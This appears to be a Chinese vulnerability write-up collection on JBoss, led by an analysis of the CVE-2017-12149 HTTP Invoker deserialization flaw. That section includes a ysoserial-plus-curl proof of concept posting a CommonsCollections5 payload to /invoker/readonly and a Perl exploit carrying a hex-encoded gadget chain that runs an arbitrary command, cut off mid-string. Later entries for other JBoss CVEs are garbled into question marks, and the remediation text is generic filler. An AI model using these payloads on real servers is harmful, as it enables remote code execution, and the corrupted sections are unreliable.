一、漏洞简介¶

1.1 漏洞背景¶

CVE-2017-12149 是针对 JBoss 5.x 版本中 HTTP Invoker 组件的另一个反序列化漏洞。该漏洞由研究员 Joao F M Figueiredo 发现并报告给 Red Hat 安全团队。

此漏洞与 CVE-2015-7501 类似，但攻击路径不同。漏洞存在于 ReadOnlyAccessFilter 的 doFilter 方法中，该方法对传入的序列化数据进行反序列化处理时，未对可反序列化的类进行限制，从而允许攻击者执行任意代码。

值得注意的是，该漏洞已被 CISA（美国网络安全和基础设施安全局）列入已知被利用漏洞目录（KEV），表明该漏洞在实际攻击中被广泛利用。

1.2 漏洞概述（包含 CVE 编号、危害等级、漏洞类型、披露时间等）¶

补充核验信息：公开时间：2017-10-04；NVD 评分：9.8（CRITICAL）；CWE：CWE-502。

二、影响范围¶

2.1 受影响的版本¶

• Red Hat JBoss Enterprise Application Platform (EAP) 5.2.0
• JBoss Application Server 5.x 系列

2.2 不受影响的版本¶

• JBoss EAP 6.x 及以上版本
• JBoss EAP 7.x 及以上版本
• 已应用 RHSA-2018:1607 或 RHSA-2018:1608 补丁的版本

2.3 触发条件（如特定模块、特定配置、特定运行环境等）¶

1. HTTP Invoker 服务启用：/invoker/readonly 端点可通过 HTTP 访问
2. 存在漏洞版本：运行 JBoss EAP 5.2.0 或相关版本
3. 网络可达性：攻击者能够访问 JBoss 服务的 HTTP 端口

三、漏洞详情与原理解析¶

3.1 漏洞触发机制¶

攻击者发送 POST 请求到 /invoker/readonly
                ↓
        ReadOnlyAccessFilter.doFilter() 被调用
                ↓
        读取请求体中的序列化数据
                ↓
        ObjectInputStream.readObject() 反序列化
                ↓
        触发 Commons Collections Gadget 链
                ↓
            执行任意代码

关键攻击路径： /invoker/readonly

3.2 源码层面的根因分析（结合源码与补丁对比）¶

漏洞代码位置： org.jboss.invocation.http.servlet.ReadOnlyAccessFilter

// ReadOnlyAccessFilter.java - 存在漏洞的代码
package org.jboss.invocation.http.servlet;

import java.io.IOException;
import java.io.ObjectInputStream;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class ReadOnlyAccessFilter implements Filter {

    public void doFilter(ServletRequest request, ServletResponse response,
            FilterChain chain) throws IOException, ServletException {

        HttpServletRequest httpRequest = (HttpServletRequest) request;
        HttpServletResponse httpResponse = (HttpServletResponse) response;

        // 只处理 POST 请求
        if (!"POST".equalsIgnoreCase(httpRequest.getMethod())) {
            chain.doFilter(request, response);
            return;
        }

        try {
            // 危险：直接从请求流读取并反序列化对象
            // 没有对可反序列化的类进行任何限制！
            ObjectInputStream ois = new ObjectInputStream(httpRequest.getInputStream());

            // 反序列化操作 - 触发 Gadget 链
            Object invocation = ois.readObject();

            // 处理调用...
            // 但在 readObject 时已经触发了恶意代码

        } catch (ClassNotFoundException e) {
            throw new ServletException("Failed to read invocation", e);
        }
    }

    public void init(FilterConfig filterConfig) throws ServletException {}
    public void destroy() {}
}

web.xml 中的 Filter 配置：

<!-- 部署描述符中的配置 -->
<filter>
    <filter-name>ReadOnlyAccessFilter</filter-name>
    <filter-class>org.jboss.invocation.http.servlet.ReadOnlyAccessFilter</filter-class>
</filter>

<filter-mapping>
    <filter-name>ReadOnlyAccessFilter</filter-name>
    <url-pattern>/invoker/readonly/*</url-pattern>
</filter-mapping>

与 CVE-2015-7501 的区别：

四、漏洞复现（可选）¶

4.1 环境搭建¶

使用 Vulhub 环境：

# 克隆 Vulhub 仓库
git clone https://github.com/vulhub/vulhub.git
cd vulhub/jboss/CVE-2017-12149

# 启动环境
docker-compose up -d

# 检查环境
docker ps
curl -I http://localhost:8080/invoker/readonly

手动搭建环境：

# 下载 JBoss 5.1.0.GA
wget https://sourceforge.net/projects/jboss/files/JBoss/JBoss-5.1.0.GA/jboss-5.1.0.GA-jdk6.zip/download -O jboss-5.1.0.zip
unzip jboss-5.1.0.zip

# 启动 JBoss
cd jboss-5.1.0.GA/bin
./run.sh -b 0.0.0.0

4.2 PoC 演示与测试过程¶

使用 ysoserial + curl：

# 生成 payload
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/pwned_by_cve2017_12149" > payload.ser

# 发送 exploit
curl -X POST \
    -H "Content-Type: application/x-java-serialized-object" \
    --data-binary @payload.ser \
    http://target:8080/invoker/readonly -v

# 检查结果（如果目标可访问）
# ssh target "ls -la /tmp/pwned_by_cve2017_12149"

Perl PoC 脚本（来自 gottburgm/Exploits）：

```perl

!/usr/bin/perl¶

CVE-2017-12149 JBoss Exploit¶

参考：https://github.com/gottburgm/Exploits/tree/master/CVE-2017-12149¶

use strict; use warnings; use LWP::UserAgent; use HTTP::Request; use MIME::Base64;

my $target = $ARGV[0] || die "Usage: $0 <target_url>\n"; my $command = $ARGV[1] || "id";

my $exploit_path = "/invoker/readonly";

预构造的 Commons Collections Payload（十六进制格式）¶

使用 InvokerTransformer 链执行任意命令¶

my $payload_hex = "ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B787074002F68747470733A2F2F6769746875622E636F6D2F6A6F616F6D61746F73662F6A6578626F7373207372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001B00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001B7371007E00137571007E001800000002707571007E001800000000740006696E766F6B657571007E001B00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00187371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B4702000078700000000174";

将命令添加到 payload¶

my $cmd_hex = unpack("H*", $command); $payload_hex .= sprintf("%02X", length($command)) . $cmd_hex;

$payload_hex .= "740004657865637571007E001B0000000171007E00207371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F

五、修复建议与缓解措施¶

5.1 官方版本升级建议¶

• 暂未找到权威信息，建议以厂商安全公告、修复提交记录或发布说明为准。

5.2 临时缓解方案（如修改配置文件、关闭相关模块、增加 WAF 规则等）¶

• 在完成版本升级前，建议将相关服务限制在可信网络边界内，并最小化暴露面。
• 对高风险接口、插件或调试功能实施临时下线、访问控制与日志监控。

六、参考信息 / 参考链接¶

6.1 官方安全通告¶

• https://github.com/vulhub/vulhub.git
• https://github.com/gottburgm/Exploits/tree/master/CVE-2017-12149

6.2 其他技术参考资料¶

• NVD：https://nvd.nist.gov/vuln/detail/CVE-2017-12149
• CVE：https://www.cve.org/CVERecord?id=CVE-2017-12149
• https://bugzilla.redhat.com/show_bug.cgi?id=1486220
• http://www.securityfocus.com/bid/100591
• https://access.redhat.com/errata/RHSA-2018:1607
• https://access.redhat.com/errata/RHSA-2018:1608
• https://github.com/gottburgm/Exploits/tree/master/CVE-2017-12149
• https://github.com/vulhub/vulhub.git

JBoss Red Hat JBoss Authentication Bypass Vulnerability?CVE-2010-0738?¶

??????¶

1.1 ????¶

JBoss ???????????? CVE-2010-0738 ??????????????????????? MEDIUM?CVSS 5.3???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• redhat:jboss_enterprise_application_platform:4.2.0
• redhat:jboss_enterprise_application_platform:4.3.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ????????????????????????
• ?????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a d...
• ?????? CISA KEV ???????????????????????????????

3.2 ????????????????????¶

• ?????????????NVD-CWE-noinfo?CWE-749?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2010-0738
• https://www.cve.org/CVERecord?id=CVE-2010-0738
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://marc.info/?l=bugtraq&m=132129312609324&w=2
• http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=35
• http://secunia.com/advisories/39563
• http://securityreason.com/securityalert/8408
• http://securitytracker.com/id?1023918

JBoss Red Hat JBoss Information Disclosure Vulnerability?CVE-2010-1428?¶

??????¶

1.1 ????¶

JBoss ???????????? CVE-2010-1428 ??????????????????????? HIGH?CVSS 7.5???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• redhat:jboss_enterprise_application_platform:4.2.0
• redhat:jboss_enterprise_application_platform:4.3.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ????????????????????????
• ?????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????The Web Console (aka web-console) in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to obtain sensitive information via an unspecified request th...
• ?????? CISA KEV ???????????????????????????????

3.2 ????????????????????¶

• ?????????????NVD-CWE-noinfo?CWE-749?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2010-1428
• https://www.cve.org/CVERecord?id=CVE-2010-1428
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://marc.info/?l=bugtraq&m=132698550418872&w=2
• http://secunia.com/advisories/39563
• http://securitytracker.com/id?1023917
• http://www.securityfocus.com/bid/39710
• http://www.vupen.com/english/advisories/2010/0992

JBoss Red Hat Linux JBoss Seam 2 Remote Code Execution Vulnerability?CVE-2010-1871?¶

??????¶

1.1 ????¶

JBoss ???????????? CVE-2010-1871 ??????????????????????? HIGH?CVSS 8.8???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• redhat:jboss_enterprise_application_platform:4.3.0
• redhat:enterprise_linux:4
• redhat:enterprise_linux:5
• netapp:oncommand_balance:-
• netapp:oncommand_insight:-
• netapp:oncommand_unified_manager:-

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ????????????????????????
• ?????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security ...
• ?????? CISA KEV ???????????????????????????????

3.2 ????????????????????¶

• ?????????????CWE-917?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2010-1871
• https://www.cve.org/CVERecord?id=CVE-2010-1871
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html
• http://www.redhat.com/support/errata/RHSA-2010-0564.html
• http://www.securityfocus.com/bid/41994
• http://www.securitytracker.com/id?1024253
• http://www.vupen.com/english/advisories/2010/1929

JBoss ???????CVE-2011-3606?¶

??????¶

1.1 ????¶

JBoss ???????????? CVE-2011-3606 ??????????????????????? MEDIUM?CVSS 5.4?

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• redhat:jboss_application_server:7.0.0
• redhat:jboss_application_server:7.0.1
• redhat:jboss_application_server:7.0.2

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ????????????????????????
• ?????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????A DOM based cross-site scripting flaw was found in the JBoss Application Server 7 before 7.1.0 Beta 1 administration console. A remote attacker could provide a specially-crafted web page and trick the valid JBoss AS user, with the administrator privilege, to visit it, which would lead into the DOM environment modifi...
• ??????????????????????????? PoC ???

3.2 ????????????????????¶

• ?????????????CWE-79?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2011-3606
• https://www.cve.org/CVERecord?id=CVE-2011-3606
• https://access.redhat.com/security/cve/cve-2011-3606
• https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3606
• https://security-tracker.debian.org/tracker/CVE-2011-3606

JBoss ???????CVE-2011-3609?¶

??????¶

1.1 ????¶

JBoss ???????????? CVE-2011-3609 ??????????????????????? MEDIUM?CVSS 6.5?

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• redhat:jboss_application_server:7.0.0
• redhat:jboss_application_server:7.0.1
• redhat:jboss_application_server:7.0.2

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ????????????????????????
• ?????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????A CSRF issue was found in JBoss Application Server 7 before 7.1.0. JBoss did not properly restrict access to the management console information (for example via the "Access-Control-Allow-Origin" HTTP access control flag). This can lead to unauthorized information leak if a user with admin privileges visits a special...
• ??????????????????????????? PoC ???

3.2 ????????????????????¶

• ?????????????CWE-352?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2011-3609
• https://www.cve.org/CVERecord?id=CVE-2011-3609
• https://access.redhat.com/security/cve/cve-2011-3609
• https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3609
• https://security-tracker.debian.org/tracker/CVE-2011-3609
• https://www.securityfocus.com/bid/50888

JBoss ???????CVE-2012-1094?¶

??????¶

1.1 ????¶

JBoss ???????????? CVE-2012-1094 ??????????????????????? HIGH?CVSS 7.5?

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• redhat:jboss_application_server:*, >= 7.0.0, < 7.1.1

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ????????????????????????
• ?????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????JBoss AS 7 prior to 7.1.1 and mod_cluster do not handle default hostname in the same way, which can cause the excluded-contexts list to be mismatched and the root context to be exposed.
• ??????????????????????????? PoC ???

3.2 ????????????????????¶

• ?????????????CWE-200?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2012-1094
• https://www.cve.org/CVERecord?id=CVE-2012-1094
• https://access.redhat.com/security/cve/cve-2012-1094
• https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-1094

JBoss ???????CVE-2012-2312?¶

??????¶

1.1 ????¶

JBoss ???????????? CVE-2012-2312 ??????????????????????? HIGH?CVSS 7.8?

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• redhat:jboss_application_server:7.1.0
• redhat:jboss_application_server:7.1.1
• redhat:jboss_enterprise_application_platform:6.0.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ????????????????????????
• ?????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????An Elevated Privileges issue exists in JBoss AS 7 Community Release due to the improper implementation in the security context propagation, A threat gets reused from the thread pool that still retains the security context from the process last used, which lets a local user obtain elevated privileges.
• ??????????????????????????? PoC ???

3.2 ????????????????????¶

• ?????????????CWE-269?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2012-2312
• https://www.cve.org/CVERecord?id=CVE-2012-2312
• https://access.redhat.com/security/cve/cve-2012-2312
• https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-2312
• https://security-tracker.debian.org/tracker/CVE-2012-2312

JBoss ???????CVE-2013-3734?¶

??????¶

1.1 ????¶

JBoss ???????????? CVE-2013-3734 ??????????????????????? MEDIUM?CVSS 6.6?

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• redhat:jboss_application_server:*, <= 1.2

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ????????????????????????
• ?????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????The Embedded Jopr component in JBoss Application Server includes the cleartext datasource password in unspecified HTML responses, which might allow (1) man-in-the-middle attackers to obtain sensitive information by leveraging failure to use SSL or (2) attackers to obtain sensitive information by reading the HTML sou...
• ??????????????????????????? PoC ???

3.2 ????????????????????¶

• ?????????????CWE-255?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2013-3734
• https://www.cve.org/CVERecord?id=CVE-2013-3734
• http://www.securityfocus.com/bid/60429
• https://bugzilla.redhat.com/show_bug.cgi?id=971637
• https://www.halock.com/blog/cve-2013-3734-jboss-administration-console-password-returned-response/

JBoss Red Hat JBoss RichFaces Framework Expression Language Injection Vulnerability?CVE-2018-14667?¶

??????¶

1.1 ????¶

JBoss ???????????? CVE-2018-14667 ??????????????????????? CRITICAL?CVSS 9.8???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??????¶

2.1 ??????¶

• redhat:richfaces:*, >= 3.1.0, <= 3.3.4
• redhat:enterprise_linux:5.0
• redhat:enterprise_linux:6.0

2.2 ???????¶

• NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

• ????????????????????????
• ?????????????????????????????????????

???????????¶

3.1 ??????¶

• NVD ?????The RichFaces Framework 3.X through 3.3.4 is vulnerable to Expression Language (EL) injection via the UserResource resource. A remote, unauthenticated attacker could exploit this to execute arbitrary code using a chain of java serialized objects via org.ajax4jsf.resource.UserResource$UriData.
• ?????? CISA KEV ???????????????????????????????

3.2 ????????????????????¶

• ?????????????CWE-94?
• NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

• ??????????????????????????????????????????

4.2 PoC ???????¶

• ? CISA KEV ????????????????? KEV ????? PoC?
• ??????????????????????????????????????????

???????????¶

5.1 ????????¶

• ???????????????????????????
• ??????????????????????????????????????

5.2 ????????????????????????????¶

• ??????????????????????
• ???????????????????????? WAF ???
• ????????????????????????????

?????? / ????¶

• https://nvd.nist.gov/vuln/detail/CVE-2018-14667
• https://www.cve.org/CVERecord?id=CVE-2018-14667
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• http://packetstormsecurity.com/files/156663/Richsploit-RichFaces-Exploitation-Toolkit.html
• http://seclists.org/fulldisclosure/2020/Mar/21
• http://www.securitytracker.com/id/1042037
• https://access.redhat.com/errata/RHSA-2018:3517
• https://access.redhat.com/errata/RHSA-2018:3518